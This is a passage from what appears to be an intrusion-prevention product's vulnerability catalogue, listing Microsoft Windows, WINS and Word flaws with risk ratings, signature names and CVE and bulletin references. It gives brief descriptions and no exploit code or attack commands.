Microsoft-Windows-Wimgapi-Readintegrityinfo-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1080-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There has been reported a heap buffer overflow vulnerability in Microsoft Windows. A remote attacker could exploit this vulnerability by having the target user to open a maliciously crafted WIM file on the target system. Successful exploitation can result in the arbitrary code execution.

Situation:

File-Binary_Microsoft-Windows-Wimgapi-Readintegrityinfo-Heap-Buffer-Overflow

References:

CVE-2018-8210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8210

Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Integer Overflow

Description:

A integer overflow vulnerability exists in Microsoft Windows. The flaw is due to the way kernel-mode driver parses EOT font files.

Situation:

HTTP_SS-Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow
File-Binary_Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow

References:

CVE-2009-2514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2514

BID-36029
http://www.securityfocus.com/bid/36029

MS09-065
http://technet.microsoft.com/security/bulletin/MS09-065

Microsoft-Windows-Win32k.sys-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-438-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in the Microsoft Windows kernel file win32k.sys. The public proof of concept triggers the vulnerability through a specially sized iFrame opened with the Safari web browser. A remote, unauthenticated attacker can also be trigger this vulnerability by enticing a user to visit a specially crafted web page with the vulnerable application. Successful exploitation could result in arbitrary code execution with kernel privileges. Note: This vulnerability has been confirmed by Secunia on a fully patched installation of Windows 7 64 bit, other versions may also be vulnerable.

Situation:

File-Text_Microsoft-Windows-Win32k.sys-Memory-Corruption

References:

CVE-2011-5046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5046

BID-51122
http://www.securityfocus.com/bid/51122

OSVDB-77908
http://www.osvdb.org/77908

MS12-008
http://technet.microsoft.com/security/bulletin/MS12-008

Microsoft-Windows-Windows-Script-Host-Command-Injection

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1110-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

HTTP_SHS-Microsoft-Windows-Windows-Script-Host-Command-Injection
File-Text_Microsoft-Windows-Windows-Script-Host-Command-Injection

References:

CVE-2018-8495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8495

Microsoft-Windows-WinVerifyTrust-PE-Validation-Security-Bypass

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-557-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows RT; Windows Vista; Windows XP; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012

Software:

<os>

Type:

Malfunction

Description:

A security bypass vulnerability exists in Microsoft Windows. The vulnerability is due to an error in the way WinVerifyTrust validates PE files signed with Windows Authenticode. The error allows signed PE files to be modified without impacting the signature's validation. A remote attacker can leverage this vulnerability by enticing a target user to open a crafted signed PE file. In successful attack scenarios, untrusted attacker-controlled code can be copied and executed on a target machine within the context of the currently logged in user.

Situation:

File-Exe_Microsoft-Windows-WinVerifyTrust-PE-Validation-Security-Bypass

References:

CVE-2013-3900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3900

OSVDB-100765
http://www.osvdb.org/100765

MS13-098
http://technet.microsoft.com/security/bulletin/MS13-098

Microsoft-Windows-WinVerifyTrust-Signature-Validation-CVE-2012-0151

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 7; Windows 2008

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-Exe_Microsoft-Windows-WinVerifyTrust-Signature-Validation-CVE-2012-0151

References:

CVE-2012-0151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0151

OSVDB-81135
http://www.osvdb.org/81135

MS12-024
http://technet.microsoft.com/security/bulletin/MS12-024

Microsoft-Windows-WMF-File-Parsing-DOS

About this vulnerability:	Microsoft Windows WMF File Parsing DOS
Risk:	Moderate
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Internet Explorer
Type:	Malfunction
Description:	There exists a vulnerability in Microsoft Internet explorer. A remote attacker can exploit this by sending a specially crafted WMF file to the vulnerable client.
Situation:	File-Binary_Microsoft-Windows-WMF-File-Parsing-DOS

Microsoft-Windows-WordPad-Converter-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-431-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Two code execution vulnerabilities exist in Microsoft Windows Wordpad converter. A remote attacker can exploit these vulnerabilities by enticing a target user to access a crafted Word 97 file. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged on user. An unsuccessful exploit attempt may terminate the affected application.

Situation:

File-OLE_Microsoft-Windows-WordPad-Converter-Parsing-Memory-Corruption

References:

CVE-2011-0028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0028

MS11-033
http://technet.microsoft.com/security/bulletin/MS11-033

Microsoft-Windows-Workstation-Service-NetrGetJoinInformation-Heap-Corruption

About this vulnerability:

Heap corruption vulnerability in Windows Workstation Service

Risk:

Moderate

First detected in:

sgpkg-ips-238-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Microsoft Windows Workstation Service suffers from a heap corruption vulnerability in the handling of NetrGetJoinInformation requests. A specially crafted request may cause heap corruption and allow remote attackers to execute arbitrary code on vulnerable systems.

Situation:

MSRPC-TCP_CPS-CA-Microsoft-Windows-WKSSVC-NetrGetJoinInformation-Heap-Corruption

References:

CVE-2009-1544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1544

BID-35972
http://www.securityfocus.com/bid/35972

MS09-041
http://technet.microsoft.com/security/bulletin/MS09-041

Microsoft-Windows-Workstation-Service-NetrWkstaUserEnum-DoS

About this vulnerability:

A vulnerability in Microsoft Windows Workstation Service allows denial of service

Risk:

Low

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Resource Starvation

Description:

There is a vulnerability in the Microsoft Windows Workstation Service. A malicious MSRPC request can allocate excessive amount of memory, which may cause denial of service.

Situation:

MSRPC-TCP_CPS-Microsoft-Windows-Workstation-Service-NetrWkstaUserEnum-DoS

References:

CVE-2006-6723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6723

Microsoft-Windows-Write-AndX-SMB-Processing-DOS

About this vulnerability:

Denial of service vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-172-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a denial of service vulnerability in Microsoft Windows. By sending a crafted WRITE_ANDX command, a remote attacker can cause system-wide denial of service on the vulnerable host.

Situation:

SMB-TCP_CHS-Microsoft-Windows-Write-AndX-SMB-Processing-DOS

References:

CVE-2008-4114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114

BID-31179
http://www.securityfocus.com/bid/31179

OSVDB-48153
http://www.osvdb.org/48153

MS09-001
http://technet.microsoft.com/security/bulletin/MS09-001

Microsoft-Windows-X.509-Certificate-Validation-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows 2003; Windows 2008; Windows 2012

Software:

<os>

Type:

Malfunction

Description:

A denial of service vulnerability exists in Microsoft Windows. The flaw is due to improper handling of specially crafted X.509 certificates during certificate validation. A remote attacker can exploit this vulnerability by sending a specially crafted X.509 certificate to a web service. Successful exploitation could cause a denial of service condition where the web service becomes unresponsive.

Situation:

HTTP_CS-Microsoft-Windows-X.509-Certificate-Validation-Denial-Of-Service

References:

CVE-2013-3869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3869

OSVDB-99649
http://www.osvdb.org/99649

MS13-095
http://technet.microsoft.com/security/bulletin/MS13-095

Microsoft-Windows-XP-Large-Image-Resize-DoS

About this vulnerability:	A vulnerability in Windows XP
Risk:	High
First detected in:	sgpkg-ips-409-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows XP
Software:	<os>
Type:	Malfunction
Description:	While rendering a normal image with excessively large resizing parameters in an HTML page, numerous applications could cause a infinite loop in the FrameBuffer display driver of Windows and eventually crash the system, leading to a Denial of Service condition.
Situation:	File-Text_Microsoft-Windows-XP-Large-Image-Resize-DoS

Microsoft-Winhlp32-Compressed-Phrase-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

There is a vulnerability in the way Microsoft Winhlp32 calculates a length value from values taken from a help (.hlp) file. Specially crafted values can lead to an integer overflow. This flaw results in a memory copy operation leading to a heap-based buffer overflow. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user. In a simple exploit attempt, an instance of winhlp32 will attempt to process the specially crafted file with a .hlp extension. When the memory copy process is called from the vulnerable function, the application will terminate with a memory access violation error. In a more sophisticated attack case, possibly involving code execution, the process flow will be diverted. In such a case, the behavior of the target is dependent on the attacker's malicious intentions.

Situation:

File-Binary_Microsoft-Winhlp32-Compressed-Phrase-Integer-Overflow

References:

CVE-2004-1361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1361

BID-12091
http://www.securityfocus.com/bid/12091

Microsoft-WINS-DoS

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

The WINS (Windows Internet Naming Service) Service under Windows 2003 is vulnerable to a Denial of Service from a remote attacker. It may be possible to perform a remote code execution attack using this vulnerability.

Situation:

Generic_UDP-Microsoft-WINS-DoS

References:

CVE-2003-0825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0825

BID-9624
http://www.securityfocus.com/bid/9624

Microsoft-WINS-Memory-Overwrite-CVE-2008-1451

About this vulnerability:

A vulnerability in Microsoft WINS Service

Risk:

High

First detected in:

sgpkg-ips-346-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows 2003

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows Name Service (WINS).

Situation:

WINS_CS-Microsoft-WINS-Memory-Overwrite-CVE-2008-1451

References:

CVE-2008-1451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1451

BID-29588
http://www.securityfocus.com/bid/29588

MS08-034
http://technet.microsoft.com/security/bulletin/MS08-034

Microsoft-WINS-Server-WPAD-Registration-Spoofing

About this vulnerability:

A vulnerability in Microsoft Windows' WINS service

Risk:

Moderate

First detected in:

sgpkg-ips-212-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 Server; Windows 2003; Windows 2008

Software:

<os>

Type:

Insecure Configuration

Description:

There is a spoofing vulnerability in Microsoft Windows' WINS service. This vulnerability is due to a lack of validation of NetBIOS communication names during name registration with the WINS server. This vulnerability could allow a remote authenticated attacker to redirect Internet traffic to an attacker-controlled IP address, thereby allowing man-in-the-middle and spoofing attacks.

Situation:

Generic_UDP-WINS-WPAD-Host-Name-Registration

References:

CVE-2009-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0094

BID-34013
http://www.securityfocus.com/bid/34013

OSVDB-52520
http://www.osvdb.org/52520

MS09-008
http://technet.microsoft.com/security/bulletin/MS09-008

Microsoft-WINS-Service-Failed-Response-CVE-2011-1248

About this vulnerability:

A vulnerability in Microsoft WINS Service

Risk:

High

First detected in:

sgpkg-ips-390-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2003; Windows 2008; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows Name Service (WINS).

Situation:

WINS_CS-Microsoft-WINS-Service-Failed-Response-CVE-2011-1248

References:

CVE-2011-1248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1248

BID-47730
http://www.securityfocus.com/bid/47730

OSVDB-72234
http://www.osvdb.org/72234

MS11-035
http://technet.microsoft.com/security/bulletin/MS11-035

Microsoft-WMI-Administrative-Tools-ActiveX-Control

About this vulnerability:

A vulnerability in Microsoft WMI Administrative Tools

Risk:

High

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft WMI Administrative Tools

Type:

Malfunction

Description:

Multiple vulnerabilities have been reported in Microsoft Windows Management Instrumentation (WMI) Administrative Tools that could be exploited by remote attackers to compromise a vulnerable user's system. The vulnerabilities are due to the way "AddContextRef()" and "ReleaseContext()" methods of the WMI Object Viewer control improperly handle the "lCtxHandle" parameter. Remote, unauthenticated attackers could exploit this vulnerability by enticing an unsuspecting user to process a malicious web page. This can lead to code execution on their system under the context of the affected application.

Situation:

HTTP_SS-Microsoft-WMI-Administrative-Tools-ActiveX-Control
File-Text_Microsoft-WMI-Administrative-Tools-ActiveX-Control

References:

CVE-2010-3973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3973

BID-45546
http://www.securityfocus.com/bid/45546

MS11-027
http://technet.microsoft.com/security/bulletin/MS11-027

Microsoft-WMITools-ActiveX-Control-CVE-2010-3973

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-386-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-WMITools-ActiveX-Control-CVE-2010-3973
File-Text_Microsoft-WMITools-ActiveX-Control-CVE-2010-3973

References:

CVE-2010-3973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3973

BID-45546
http://www.securityfocus.com/bid/45546

MS11-027
http://technet.microsoft.com/security/bulletin/MS11-027

Microsoft-WMP-CVE-2010-2745

About this vulnerability:

A Windows Media Player vulnerability

Risk:

High

First detected in:

sgpkg-ips-346-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Player

Type:

Malfunction

Description:

A vulnerability exists in Windows Media Player.

Situation:

HTTP_SS-WMP-2-CVE-2010-2745
HTTP_SS-WMP-1-CVE-2010-2745
File-Text_Microsoft-Windows-Media-Player-1-CVE-2010-2745
File-Text_Microsoft-Windows-Media-Player-2-CVE-2010-2745

References:

CVE-2010-2745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2745

MS10-082
http://technet.microsoft.com/security/bulletin/MS10-082

Microsoft-Word-Crafted-Smarttag-Record-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Office Word

Risk:

Moderate

First detected in:

sgpkg-ips-467-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Word. The vulnerability is due to a memory handling error while handling MS Word smart tags. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Microsoft Word document, potentially causing arbitrary code to be injected and executed in the security context of the currently logged in user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of the attack attempt. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

File-OLE_Microsoft-Word-Crafted-Smarttag-Record-Code-Execution

References:

CVE-2008-2244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2244

BID-30124
http://www.securityfocus.com/bid/30124

MS08-042
http://technet.microsoft.com/security/bulletin/MS08-042

Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow

About this vulnerability:

Microsoft Word dpcallout RTF Control Word Handling Buffer Overflow

Risk:

Moderate

First detected in:

sgpkg-ips-260-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There exists a buffer overflow vulnerability in Microsoft Word products. The flaw is due to an logic error when processing RTF documents that contain unexpected control words following a dpcallout control word. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted RTF file. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.

Situation:

HTTP_SS-Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow
File-RTF_Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow

References:

CVE-2008-4028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4028

BID-32585
http://www.securityfocus.com/bid/32585

MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072

Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Integer-Overflow

About this vulnerability:

An integer overflow vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-191-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Word; Microsoft Outlook; Microsoft Word Viewer; Microsoft Works

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in Microsoft Word. The product incorrectly processes Rich Text Format (RTF) files that contain polygon or polyline drawing objects with a large number of points, resulting in an integer overflow. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted RTF file or an RTF-formatted email using the affected applications. A successful exploitation can lead to arbitrary code execution in the security context of the affected user.

Situation:

HTTP_SS-Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Integer-Overflow
File-RTF_Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Overflow

References:

CVE-2008-4025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4025

MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072

Microsoft-Word-Fcplcffldmom-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-688-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A vulnerability in Microsoft Word.

Situation:

File-OLE_Microsoft-Word-Fcplcffldmom-Memory-Corruption

References:

CVE-2015-2477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2477

MS15-081
http://technet.microsoft.com/security/bulletin/MS15-081

Microsoft-Word-File-Information-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-264-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word; Microsoft Word Viewer

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft Word.

Situation:

HTTP_SS-Microsoft-Word-File-Information-Memory-Corruption-MS09-068

References:

CVE-2009-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2135

BID-35437
http://www.securityfocus.com/bid/35437

OSVDB-55232
http://www.osvdb.org/55232

OSVDB-55231
http://www.osvdb.org/55231

MS09-068
http://technet.microsoft.com/security/bulletin/MS09-068

Microsoft-Word-Font-Table-Remote-Code-Execution-CVE-2023-21716

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-1563-5242

Last changed:

sgpkg-ips-1568-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been reported in Microsoft Word. The vulnerability is due to insufficient validation of RTF files with a large number of fonts defined in the font table. A remote attacker could exploit the vulnerability by enticing a user to open a specially crafted RTF document. Successful exploitation could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-RTF_Microsoft-Word-Font-Table-Remote-Code-Execution-CVE-2023-21716

References:

CVE-2023-21716
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21716

ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb

Microsoft-Word-GLB-File-Parsing-Out-of-Bounds-Write

About this vulnerability:

A vulnerability in Microsoft Word.

Risk:

High

First detected in:

sgpkg-ips-1441-5242

Last changed:

sgpkg-ips-1441-5242

Platform:

Generic

Software:

Microsoft Word

Type:

Malfunction

Description:

A vulnerability in Microsoft Word and Microsoft Office, Microsoft 365 Apps for Enterprise, Office 2019, Office 2019 for Mac, which allows remote attackers to execute arbitrary code on the target system by enticing the user to open a specially crafted document, due to the improper validation on user-supplied data while parsing GLB files.

Situation:

File-Binary_Microsoft-Word-GLB-File-Parsing-Out-of-Bounds-Write

References:

CVE-2021-34478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34478

Microsoft-Word-Global-Array-Index-Heap-Overflow

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

Moderate

First detected in:

sgpkg-ips-467-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in Microsoft Word. The flaw is due to an index error when processing DOC document that contains a crafted TextFlow record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted DOC file. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.

Situation:

File-OLE_Microsoft-Word-Global-Array-Index-Heap-Overflow

References:

CVE-2008-4026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4026

BID-32583
http://www.securityfocus.com/bid/32583

MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072

Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903

About this vulnerability:

A memory corruption vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-329-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Microsoft Word.

Situation:

E-Mail_BS-Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
HTTP_SS-Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
File-OLE_Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903

References:

CVE-2010-1903
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1903

MS10-056
http://technet.microsoft.com/security/bulletin/MS10-056

Microsoft-Word-Malformed-Index-Code-Execution

About this vulnerability:

There exists a code execution vulnerability in Microsoft Word.

Risk:

Moderate

First detected in:

sgpkg-ips-1035-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

There exists a code execution vulnerability in Microsoft Word.

Situation:

File-OLE_Microsoft-Word-Malformed-Index-Code-Execution

References:

CVE-2010-2750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2750

BID-43766
http://www.securityfocus.com/bid/43766

MS10-079
http://technet.microsoft.com/security/bulletin/MS10-079

Microsoft-Word-Malformed-String-Memory-Corruption

About this vulnerability:

A buffer overflow vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-125-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Microsoft Word; Microsoft Office

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Word processes. The vulnerability is a result of insufficient boundary checking while parsing a font table structure in a specially crafted file. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Word document, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_Microsoft-Word-For-Macintosh-Version-5-Document
File-Binary_Microsoft-Word-For-Macintosh-Version-5-Document

References:

CVE-2007-3899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3899

BID-25906
http://www.securityfocus.com/bid/25906

MS07-060
http://technet.microsoft.com/security/bulletin/MS07-060

Microsoft-Word-Mso.dll-Lscreateline-Memory-Corruption

About this vulnerability:	A vulnerability in Microsoft Word
Risk:	Moderate
First detected in:	sgpkg-ips-436-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Microsoft Word
Type:	Malfunction
Description:	There exists a memory corruption vulnerability in the dynamically-linked library mso.dll which is shipped with Microsoft Word. The flaw is caused by an improper check when processing data in Microsoft Word documents. An attacker may exploit this vulnerability to inject and execute arbitrary code in the security context of the currently logged in user. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Word application will terminate. This can potentially lead to loss of data contained in the documents. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user. The affected application would also most likely stop functioning as a result of such an attack.
Situation:	File-OLE_Microsoft-Word-Mso.dll-Lscreateline-Memory-Corruption

Microsoft-Word-RCE-Vulnerability-CVE-2015-0097

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Word

Type:

Malfunction

Description:

A vulnerability in Microsoft Word

Situation:

File-OLE_Microsoft-Word-RCE-Vulnerability-CVE-2015-0097

References:

CVE-2015-0097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0097

MS15-022
http://technet.microsoft.com/security/bulletin/MS15-022

Microsoft-Word-Remote-Code-Execution-Vulnerability-CVE-2024-21379

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Word detected

Risk:

High

First detected in:

sgpkg-ips-1691-5242

Last changed:

sgpkg-ips-1691-5242

Platform:

Generic

Software:

Microsoft Word

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported for Microsoft Word.

Situation:

File-PDF_Microsoft-Word-Remote-Code-Execution-Vulnerability-CVE-2024-21379

References:

CVE-2024-21379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21379

ms24-feb
http://technet.microsoft.com/security/bulletin/ms24-feb

Microsoft-Word-RTF-Bitmap-Biwidth-Biheight-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Buffer Overflow

Description:

A heap buffer overflow in Microsoft Office can be exploited by a crafted RTF file with an embedded bitmap image. A successful attack allows arbitrary code execution on the target machine.

Situation:

File-RTF_Microsoft-Word-RTF-Bitmap-Biwidth-Biheight-Heap-Buffer-Overflow

References:

CVE-2016-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0010

MS16-004
http://technet.microsoft.com/security/bulletin/MS16-004

Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Word RTF Drawing Object Parsing

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

A vulnerability in Microsoft Word RTF Drawing Object Parsing allows attackers to execute arbitrary code

Situation:

HTTP_SS-Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability
File-RTF_Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability

References:

CVE-2008-1091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1091

BID-29104
http://www.securityfocus.com/bid/29104

MS08-026
http://technet.microsoft.com/security/bulletin/MS08-026

Microsoft-Word-RTF-Mismatch-CVE-2012-0183

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word 2003; Microsoft Word 2007; Microsoft Office 2011; Microsoft Office Compatibility Pack

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Word.

Situation:

File-RTF_Microsoft-Word-RTF-Mismatch-CVE-2012-0183

References:

CVE-2012-0183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0183

BID-53344
http://www.securityfocus.com/bid/53344

MS12-029
http://technet.microsoft.com/security/bulletin/MS12-029

Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902

About this vulnerability:

A memory corruption vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-328-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

